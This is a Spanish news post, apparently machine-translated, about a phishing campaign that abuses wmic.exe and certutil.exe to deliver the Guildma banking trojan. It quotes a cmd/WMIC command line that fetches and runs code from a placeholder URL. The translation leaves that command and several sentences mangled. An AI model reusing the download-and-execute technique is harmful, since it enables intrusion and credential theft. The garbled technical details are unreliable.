Malware abusa de dos archivos legítimos de Windows para robar datos personales

Los investigadores descubrieron un nuevo malware que abusaba de dos archivos de Windows legítimos y lo usaba contra las víctimas comprometidas para robar información confidencial.

Un archivo wmic.exe es una utilidad de línea de comandos y el otro archivo certutil.exe es un programa que administra certificados para Windows.

Estos archivos se usan para descargar la carga útil en la máquina de Windows infectada y también otros archivos que luego se usaron con fines maliciosos.

Los atacantes que usan más técnicas de evasión en esta campaña y ambos archivos ya están siendo utilizados por otro malware, pero el ataque actual integra ambos archivos.

Los investigadores creen que los ciberdelincuentes detrás del malware atacan usando herramientas y técnicas poderosas para realizar operaciones más sigilosas.

La etapa inicial de la infección comienza con la campaña de correo electrónico malintencionado que se dirige a los usuarios junto con el contenido de notificación de urgencia del servicio postal de Brasil para engañar a los usuarios para que hagan clic en los enlaces dentro del correo electrónico que se presentaba cuando los usuarios perdían el intento de entrega postal.

El usuario del truco del atacante puede hacer clic en el enlace incrustado diciendo que puede encontrar más detalles haciendo clic en el enlace.

Una vez que las víctimas hacen clic en el enlace y en la ventana emergente de nuevas ventanas que intentan descargar un archivo Zip malicioso.

Según el informe de Trend Micro, una vez que el archivo zip se haya descargado y extraído, se le presentará al usuario un archivo LNK (detectado como Trojan.LNK.DLOADR.AUSUJM) . El archivo LNK luego apuntará a cmd.exe usando el siguiente parámetro: / k start / MIN% WINDIR $ \\ system32 \\ wbem \\ WMIC.exe para obtener / format {URL} && exit

El cmd.exe es responsable de ejecutar wmic.exe a través del siguiente parámetro: os obtener / format {URL}

Después de la ejecución de cmd.exe, intente descargar y ejecutar el comando desde su servidor de comando y control.

Elimina la copia del archivo Certutil.exe de Windows en la carpeta %temp% con un nombre diferente y el siguiente proceso involucrado es intentar comunicarse con el nuevo servidor de C&C para descargar un nuevo conjunto de archivos.

Aquí viene la carga útil principal que Trend Micro detectó como TSPY_GUILDMA.C, y los investigadores creen que la carga útil muestra que se trata de un malware bancario que solo funciona cuando el idioma del objetivo está configurado en portugués.

Finalmente, la carga útil se ejecutará en la máquina de las víctimas utilizando regsvr32.exe para robar información bancaria, como detalles de transacciones y credenciales de inicio de sesión.

Fecha actualización el 2021-10-26. Fecha publicación el 2018-10-26. Categoría: malware Autor: Oscar olg Mapa del sitio Fuente: gbhackers
malware